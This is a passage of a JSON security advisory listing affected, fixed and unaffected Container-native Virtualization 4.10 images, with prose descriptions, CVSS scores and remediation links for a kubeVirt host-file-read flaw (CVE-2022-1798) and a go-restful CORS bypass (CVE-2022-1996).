"product_id": "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64"
},
"product_reference": "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64"
},
"product_reference": "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64"
},
"product_reference": "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64"
},
"product_reference": "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64"
},
"product_reference": "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"names": [
"Oliver Brooks and James Klopchic"
],
"organization": "NCC Group"
}
],
"cve": "CVE-2022-1798",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2022-08-12T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64",
"8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64",
"8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64",
"8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64",
"8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64",
"8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64",
"8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64",
"8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64",
"8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64",
"8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64",
"8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64",
"8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64",
"8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64",
"8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64",
"8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64",
"8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64",
"8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64",
"8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64",
"8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64",
"8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2117872"
}
],
"notes": [
{
"category": "description",
"text": "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64"
],
"known_not_affected": [
"8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64",
"8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64",
"8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64",
"8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64",
"8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64",
"8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64",
"8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64",
"8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64",
"8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64",
"8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64",
"8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64",
"8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64",
"8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64",
"8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64",
"8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64",
"8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64",
"8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64",
"8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64",
"8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64",
"8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-1798"
},
{
"category": "external",
"summary": "RHBZ#2117872",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-1798",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1798"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798"
},
{
"category": "external",
"summary": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm",
"url": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm"
}
],
"release_date": "2022-08-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-09-06T14:00:38+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:6351"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs"
},
{
"cve": "CVE-2022-1996",
"cwe": {
"id": "CWE-639",
"name": "Authorization Bypass Through User-Controlled Key"
},
"discovery_date": "2022-06-08T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64",
"8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64",
"8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64",
"8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64",
"8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64",
"8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64",
"8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64",
"8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64",
"8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64",
"8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64",
"8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64",
"8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64",
"8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64",
"8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64",
"8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64",
"8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64",
"8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64",
"8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64",
"8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64",
"8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2094982"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in CORS Filter feature from the go-restful package. When a user inputs a domain which is in AllowedDomains, all domains starting with the same pattern are accepted. This issue could allow an attacker to break the CORS policy by allowing any page to make requests and retrieve data on behalf of users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "go-restful: Authorization Bypass Through User-Controlled Key",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The go-restful package is a transitive dependency which is being pulled with k8s.io/api and not directly being used anywhere in OpenShift Container Platform (OCP), OpenShift Container Storage, OpenShift Data Foundation, OpenShift Do and OpenShift Pipelines, hence these components are marked as \u0027Will not fix\u0027 or even \"Not affected\".",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64"
],
"known_not_affected": [
"8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64",
"8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64",
"8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64",
"8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64",
"8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64",
"8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64",
"8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64",
"8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64",
"8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64",
"8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64",
"8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64",
"8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64",
"8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64",
"8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64",
"8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64",
"8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64",
"8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64",
"8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64",
"8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64",
"8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-1996"
},
{
"category": "external",
"summary": "RHBZ#2094982",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094982"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-1996",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1996"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-1996",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1996"
}
],
"release_date": "2022-06-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-09-06T14:00:38+00:00",
